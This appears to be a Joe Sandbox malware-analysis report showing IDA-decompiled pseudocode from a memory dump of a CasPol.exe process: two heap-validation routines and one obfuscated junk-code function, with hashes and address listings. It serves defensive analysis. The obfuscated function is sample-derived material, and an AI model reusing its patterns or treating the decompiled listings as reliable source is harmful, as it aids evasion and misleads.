                                                                        0x00000000
                                                                        0x0144b926
                                                                        0x00000000
                                                                        0x0144b926

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5996f8378599abab1afdd8534cfc30dce191a06b840803100919e8b87a6df0f5
                                                                        • Instruction ID: 575338383bfe4e9ed8040610f5ccc50d4efd50716e91bbe8713d4a97432c392b
                                                                        • Opcode Fuzzy Hash: 5996f8378599abab1afdd8534cfc30dce191a06b840803100919e8b87a6df0f5
                                                                        • Instruction Fuzzy Hash: 38711E32200B02EFF732CF28C844F66BBA5EB44728F15492AE6559B6B0DB75E941CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01436DC9 Relevance: .2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E01436DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L013D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01436B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E013D7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E013F9AE0();
					_t87 = L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0143795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0143795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0143795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0143795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L013D4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01436B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01436B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01436B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01436B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E013D7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E013F9AE0();
								L013D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L013D2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L013D2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L013D2400( &_v52);
							}
							if(_v28 >= 0) {
								return L013D2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                        0x01436dd4
                                                                        0x01436dde
                                                                        0x01436de1
                                                                        0x01436de3
                                                                        0x01436de6
                                                                        0x01436de9
                                                                        0x01436dec
                                                                        0x01436def
                                                                        0x01436df2
                                                                        0x01436df5
                                                                        0x01436dfe
                                                                        0x01436e04
                                                                        0x01436e09
                                                                        0x01436e0d
                                                                        0x01436e18
                                                                        0x01436e1b
                                                                        0x01436e22
                                                                        0x01436e2d
                                                                        0x01436e30
                                                                        0x01436e36
                                                                        0x01436e42
                                                                        0x01436e4d
                                                                        0x01436e50
                                                                        0x01436e55
                                                                        0x01436e5c
                                                                        0x01436e6e
                                                                        0x01436e5e
                                                                        0x01436e67
                                                                        0x01436e67
                                                                        0x01436e73
                                                                        0x01436e74
                                                                        0x01436e77
                                                                        0x01436e7c
                                                                        0x01436e7d
                                                                        0x01436e8e
                                                                        0x01436e93
                                                                        0x01436e9c
                                                                        0x01436ea8
                                                                        0x01436eab
                                                                        0x01436eac
                                                                        0x01436eb3
                                                                        0x01436ecd
                                                                        0x01436edc
                                                                        0x01436ee2
                                                                        0x01436ee5
                                                                        0x01436ef2
                                                                        0x01436efb
                                                                        0x01436f01
                                                                        0x01436f06
                                                                        0x01436f0b
                                                                        0x01436f11
                                                                        0x01436f1a
                                                                        0x01436f22
                                                                        0x01436f26
                                                                        0x01436f26
                                                                        0x01436f33
                                                                        0x01436f41
                                                                        0x01436f44
                                                                        0x01436f47
                                                                        0x01436f54
                                                                        0x01436f65
                                                                        0x01436f77
                                                                        0x01436f7c
                                                                        0x01436f82
                                                                        0x01436f91
                                                                        0x01436f99
                                                                        0x01436fa3
                                                                        0x01436fae
                                                                        0x01436fae
                                                                        0x01436fba
                                                                        0x01436fbb
                                                                        0x01436fbc
                                                                        0x01436fc1
                                                                        0x01436fc2
                                                                        0x01436fd3
                                                                        0x01436fd8
                                                                        0x01436fd8
                                                                        0x01436fdf
                                                                        0x01436fe8
                                                                        0x01436fee
                                                                        0x01436fee
                                                                        0x01436ff5
                                                                        0x01436ffb
                                                                        0x01436ffb
                                                                        0x01437004
                                                                        0x00000000
                                                                        0x0143700a
                                                                        0x01437004
                                                                        0x01436eb3
                                                                        0x01436e9c
                                                                        0x01437015

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                        • Instruction ID: 5356061fcb1f4547578cecaf188c206a76085c6210ed002187bb93c7016ff50f
                                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                        • Instruction Fuzzy Hash: 5F717F71A0021AEFDB11DFA9C984AEEBBB9FF98714F10416AE505E7250D734AA41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01471002 Relevance: .2, Instructions: 198COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E01471002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x14a5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x14a58b0 = _t128;
								 *0x14a58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x14a58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x14a58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x14a58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x14a58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x14a5898 = 7;
										return _t75;
									} else {
										 *0x14a5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x14a5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                                                        0x01471002
                                                                        0x0147100c
                                                                        0x0147100f
                                                                        0x01471012
                                                                        0x01471018
                                                                        0x00000000
                                                                        0x0147102e
                                                                        0x01471030
                                                                        0x00000000
                                                                        0x01471032
                                                                        0x01471032
                                                                        0x01471038
                                                                        0x01471038
                                                                        0x0147121e
                                                                        0x014711ff
                                                                        0x01471205
                                                                        0x01471207
                                                                        0x0147120c
                                                                        0x0147120e
                                                                        0x01471210
                                                                        0x01471212
                                                                        0x01471212
                                                                        0x01471210
                                                                        0x0147121c
                                                                        0x0147121c
                                                                        0x01471228
                                                                        0x01471228
                                                                        0x0147101c
                                                                        0x0147101c
                                                                        0x0147101c
                                                                        0x0147101f
                                                                        0x01471022
                                                                        0x01471025
                                                                        0x0147102c
                                                                        0x0147102c
                                                                        0x00000000
                                                                        0x0147102c
                                                                        0x01471027
                                                                        0x0147102a
                                                                        0x0147103f
                                                                        0x0147103f
                                                                        0x01471042
                                                                        0x01471044
                                                                        0x01471047
                                                                        0x01471049
                                                                        0x0147104c
                                                                        0x0147104e
                                                                        0x01471088
                                                                        0x01471088
                                                                        0x0147108a
                                                                        0x0147108d
                                                                        0x0147108f
                                                                        0x01471091
                                                                        0x01471091
                                                                        0x01471093
                                                                        0x01471095
                                                                        0x01471097
                                                                        0x014710c8
                                                                        0x014710cb
                                                                        0x014710ce
                                                                        0x014710d0
                                                                        0x014710f4
                                                                        0x014710f4
                                                                        0x014710fa
                                                                        0x01471100
                                                                        0x01471102
                                                                        0x01471150
                                                                        0x01471150
                                                                        0x01471154
                                                                        0x01471167
                                                                        0x0147116a
                                                                        0x0147116a
                                                                        0x01471156
                                                                        0x01471156
                                                                        0x01471158
                                                                        0x0147115b
                                                                        0x0147115d
                                                                        0x0147115f
                                                                        0x0147115f
                                                                        0x0147115f
                                                                        0x01471162
                                                                        0x01471162
                                                                        0x0147116c
                                                                        0x0147116f
                                                                        0x01471171
                                                                        0x0147117b
                                                                        0x0147117b
                                                                        0x0147117d
                                                                        0x01471183
                                                                        0x01471183
                                                                        0x01471186
                                                                        0x01471188
                                                                        0x01471199
                                                                        0x0147118a
                                                                        0x0147118a
                                                                        0x0147118c
                                                                        0x0147118f
                                                                        0x01471191
                                                                        0x01471191
                                                                        0x01471191
                                                                        0x01471194
                                                                        0x01471194
                                                                        0x0147119c
                                                                        0x014711a2
                                                                        0x014711a8
                                                                        0x014711ac
                                                                        0x014711af
                                                                        0x014711c7
                                                                        0x014711b1
                                                                        0x014711b1
                                                                        0x014711b4
                                                                        0x014711b7
                                                                        0x014711b9
                                                                        0x014711b9
                                                                        0x014711b9
                                                                        0x014711bc
                                                                        0x014711c2
                                                                        0x014711c2
                                                                        0x014711cb
                                                                        0x014711ce
                                                                        0x014711d4
                                                                        0x014711e7
                                                                        0x014711ed
                                                                        0x014711ef
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014711f1
                                                                        0x00000000
                                                                        0x014711d6
                                                                        0x014711d6
                                                                        0x00000000
                                                                        0x014711d6
                                                                        0x014711d4
                                                                        0x01471104
                                                                        0x01471106
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01471108
                                                                        0x0147110c
                                                                        0x0147111d
                                                                        0x0147110e
                                                                        0x0147110e
                                                                        0x01471110
                                                                        0x01471113
                                                                        0x01471115
                                                                        0x01471115
                                                                        0x01471115
                                                                        0x01471118
                                                                        0x01471118
                                                                        0x01471126
                                                                        0x0147113a
                                                                        0x0147113d
                                                                        0x0147113f
                                                                        0x00000000
                                                                        0x01471141
                                                                        0x01471141
                                                                        0x00000000
                                                                        0x01471141
                                                                        0x0147113f
                                                                        0x014710d6
                                                                        0x014710d9
                                                                        0x014710dd
                                                                        0x014710e3
                                                                        0x014710e6
                                                                        0x014710e9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014710ee
                                                                        0x014710f0
                                                                        0x014710f2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014710f2
                                                                        0x00000000
                                                                        0x01471099
                                                                        0x01471099
                                                                        0x0147109c
                                                                        0x0147109c
                                                                        0x0147109e
                                                                        0x014710a0
                                                                        0x014710b3
                                                                        0x014710a2
                                                                        0x014710a2
                                                                        0x014710a4
                                                                        0x014710a7
                                                                        0x014710a9
                                                                        0x014710ab
                                                                        0x014710ab
                                                                        0x014710ab
                                                                        0x014710ae
                                                                        0x014710ae
                                                                        0x014710b6
                                                                        0x014710b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014710be
                                                                        0x014710c1
                                                                        0x014710c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014710c3
                                                                        0x014710c5
                                                                        0x00000000
                                                                        0x014710c5
                                                                        0x01471097
                                                                        0x01471050
                                                                        0x01471053
                                                                        0x01471056
                                                                        0x01471059
                                                                        0x0147105c
                                                                        0x0147105e
                                                                        0x01471060
                                                                        0x01471062
                                                                        0x01471064
                                                                        0x01471064
                                                                        0x01471062
                                                                        0x01471066
                                                                        0x01471069
                                                                        0x0147106b
                                                                        0x0147106d
                                                                        0x0147106f
                                                                        0x01471076
                                                                        0x01471076
                                                                        0x01471076
                                                                        0x00000000
                                                                        0x01471076
                                                                        0x01471071
                                                                        0x01471074
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01471074
                                                                        0x01471079
                                                                        0x01471079
                                                                        0x0147107b
                                                                        0x0147107b
                                                                        0x0147107f
                                                                        0x01471082
                                                                        0x01471085
                                                                        0x00000000
                                                                        0x01471085
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d0030a55c4440dc4d6cf502644a1fa9bf31dd2cbf71542f11d41e69ffee77bc
                                                                        • Instruction ID: 25bf4b59a36d20db73f26c71e1ed751535006049b8c098bbf65ce77d95c0d4a6
                                                                        • Opcode Fuzzy Hash: 1d0030a55c4440dc4d6cf502644a1fa9bf31dd2cbf71542f11d41e69ffee77bc
                                                                        • Instruction Fuzzy Hash: 8971CF74A003A2CBDB25CF5AD5806BAB7F1FF48B00B65486FD9829BB60D771E950CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422BF8 Relevance: .2, Instructions: 171COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 48%
                                                                        			E00422BF8(signed char __eax, void* __ebx, signed int __edx, signed int __esi) {
				signed char _t13;
				void* _t14;
				signed int _t15;
				signed int _t22;
				signed int _t24;
				signed char _t30;
				signed char _t33;
				void* _t37;
				intOrPtr _t38;
				signed int _t41;
				signed int _t45;
				intOrPtr _t46;
				signed int _t47;
				void* _t51;
				void* _t56;

				_t13 = __eax;
				 *0xab9c4208 =  *0xab9c4208 ^ __edx;
				asm("adc esi, 0x32baf2c1");
				_push( *0xefa8e0cc);
				asm("cmpsw");
				_t41 = (__esi ^  *0x983e0416) -  *0xbed3f5bd;
				_pop(_t37);
				asm("adc [0xa4071c62], edi");
				 *0xcc32c1db =  *0xcc32c1db ^ _t45;
				 *0x16efa8e0 =  *0x16efa8e0 << 0x19;
				asm("ror dword [0x7c73a2fe], 0x77");
				 *0xef45d8a8 =  *0xef45d8a8 << 0x22;
				 *0xa0f4be16 =  *0xa0f4be16 >> 0xf6;
				asm("adc esi, [0x99d1b49b]");
				asm("adc [0x49395fa8], ah");
				asm("ror byte [0x947a16d2], 0x3d");
				 *0xdec32e33 =  *0xdec32e33 - _t37;
				 *0xe0cc32c1 = _t45;
				 *0xc16efa8 =  *0xc16efa8 >> 0xda;
				_t38 = _t37 + 1;
				asm("rol byte [0xccecc9b4], 0x58");
				 *0xcdc48616 =  *0x16d24939 - 0x0000001c | 0xf2;
				_t33 = 0x3c;
				asm("sbb esi, 0x32c1ddbd");
				_t30 =  *0xcdc48616 |  *0xefa8e0cc;
				_t56 = (__ebx +  *0xc4a8009a ^  *0x93b70016) - 1;
				if(_t56 < 0) {
					L1:
					asm("sbb [0x939ff7b7], ch");
					asm("sbb cl, [0x8f83e7b0]");
				} else {
					__ebp = __ebp & 0xaf88ac70;
					_pop(__edi);
					 *0x54942410 =  *0x54942410 >> 0x7b;
					 *0xaddd0fb4 =  *0xaddd0fb4 & __ch;
					asm("adc [0xef45d88d], esp");
					 *0x90e04c16 =  *0x90e04c16 ^ __edx;
					if( *0x90e04c16 > 0) {
						goto L1;
						do {
							do {
								do {
									do {
										do {
											do {
												goto L1;
											} while (_t56 == 0);
											_t22 =  *0xdc624d74;
											_t46 =  *0xc419e217;
											_t13 = _t13 + 0x84e5c4bb;
										} while (_t13 != 0);
										asm("adc [0xdd634e75], ebp");
										 *0xaeb00218 =  *0xaeb00218 - _t13;
									} while ( *0xaeb00218 >= 0);
									 *0xe77cd173 =  *0xe77cd173 >> 0x49;
									asm("lodsb");
									asm("sbb ecx, 0xef4544a1");
									asm("adc edx, [0x2f9d1616]");
									_t33 = _t33 ^ 0x0000001c;
									asm("adc [0x32c1ddbd], edx");
									 *0xefa8e0cc =  *0xefa8e0cc + _t13;
									asm("adc ecx, [0x85c02c16]");
									asm("adc eax, 0xb2efca25");
									asm("adc al, [0xa8e0cc32]");
									asm("adc [0xc6a616ef], eax");
									_t47 = _t46 + 1;
									 *0xa8e0cc32 =  *0xa8e0cc32 << 0xe9;
									 *0xc83916ef = _t22;
								} while ( *0xa8e0cc32 != 0);
								asm("ror dword [0x997775], 0x29");
								asm("rcl dword [0x45d8a8c4], 0xd9");
								asm("rol dword [0xe0cc32c1], 0xb2");
								asm("sbb al, 0xa8");
								_t38 = _t38 -  *0xc83816ef;
							} while (_t38 != 0);
							_t14 = _t13 + 1;
							_push(_t14);
							 *0xef45d88d = _t47;
							asm("rcl byte [0x4052173a], 0xd3");
							_push(_t14);
							asm("rol dword [0x81c42916], 0x83");
							asm("ror byte [0x4052173a], 0x66");
							 *0x9cba1d16 = _t41 & 0x81d04116 &  *0xef45d88d;
							_t15 = _t14;
							 *0xaddd0fb4 =  *0xaddd0fb4 << 0x90;
							asm("rol dword [0x87dbae16], 0x64");
							 *0xe7553110 =  *0xe7553110 >> 0x65;
							_t38 =  *0x453d99a1;
							asm("sbb edx, [0x32ee16ef]");
							asm("rcr dword [0xe0cc3283], 0x9b");
							_t24 = (_t22 |  *0xef45d88d) ^ 0x000000a8;
							 *0x6d2b16ef =  *0x6d2b16ef & _t15;
							asm("adc ah, [0xefbe0b1c]");
							 *0x8a16efa8 =  *0x8a16efa8 & _t15;
							_t41 =  *0xcc32bfdd;
							asm("adc esp, 0x2b7093ff");
							 *0xcc32c5f7 =  *0xcc32c5f7 ^ _t24;
							_t13 = _t15 &  *0xbe17ff2f | 0xe6;
							asm("rol byte [0xf216efa8], 0x92");
							asm("adc ch, 0x34");
							_t51 = _t51 -  *0xef45d88d -  *0xd9b004fa;
							 *0xe0cc32b9 =  *0xe0cc32b9 + _t30;
							_t33 = (_t33 +  *0x52173a7b |  *0x16efa8e0) & 0x000000a8;
							 *0xc62116ef =  *0xc62116ef >> 0xd8;
							asm("adc [0x1ee67b3], bl");
							asm("ror dword [0x395fc0d6], 0xaa");
							_t30 = _t30 - 1;
						} while (( *0xa2f716d2 & _t30) <= 0);
						asm("sbb [0xe2aa9076], esp");
						asm("adc edx, [0x395f828e]");
						 *0x36b616d2 =  *0x36b616d2 + _t24;
						asm("rcr dword [0xebb8140b], 0x4");
						 *0xa816efa8 =  *0xa816efa8 - _t13;
						 *0x9d8d8ce2 =  *0x9d8d8ce2 & _t33;
						asm("sbb [0x16efa8e0], cl");
						asm("sbb ecx, [0x1269e8e]");
						 *0x32c1d79c = 0xcc32aece;
						asm("rol dword [0x9af2ba16], 0x4a");
						 *0xccf9af86 =  *0xccf9af86 << 0x98;
						return _t13;
					} else {
						asm("rcl dword [0xa8008977], 0xc1");
						asm("adc ebx, 0x45d8a8c4");
						 *0x40ecb2a1 =  *0x40ecb2a1 << 0xe;
						asm("ror byte [0x8f16ef88], 0xfb");
						__edx = __edx |  *0x826380d6;
						 *0xd8a8c4a8 =  *0xd8a8c4a8 & __ch;
						__ebp = __ebp + 1;
						__edi = __edi |  *0x121f16ef;
						_push( *0xf9e2bbc);
						asm("adc ch, 0x88");
						__ebx =  *0x395fc2cc;
						 *0x941616d2 =  *0x941616d2 + __bh;
						 *0xdec32e33 = 0xe24b16ef;
						_push( *0xe0cc32c1);
						_t12 = __dl;
						__dl =  *0x6216efa8;
						 *0x6216efa8 = _t12;
						 *0x9a8081e2 =  *0x9a8081e2 & __bl;
						asm("rol dword [0x16ef45d8], 0xe2");
						asm("sbb [0x3a78d6b6], dh");
						__al = __al | 0x00000016;
						return __eax;
					}
				}
			}


















                                                                        0x00422bf8
                                                                        0x00422bff
                                                                        0x00422c05
                                                                        0x00422c0b
                                                                        0x00422c17
                                                                        0x00422c19
                                                                        0x00422c1f
                                                                        0x00422c29
                                                                        0x00422c2f
                                                                        0x00422c35
                                                                        0x00422c3c
                                                                        0x00422c49
                                                                        0x00422c50
                                                                        0x00422c57
                                                                        0x00422c5d
                                                                        0x00422c63
                                                                        0x00422c6a
                                                                        0x00422c70
                                                                        0x00422c76
                                                                        0x00422c7d
                                                                        0x00422c81
                                                                        0x00422c91
                                                                        0x00422c97
                                                                        0x00422c99
                                                                        0x00422c9f
                                                                        0x00422cab
                                                                        0x00422cac
                                                                        0x00422a03
                                                                        0x00422a03
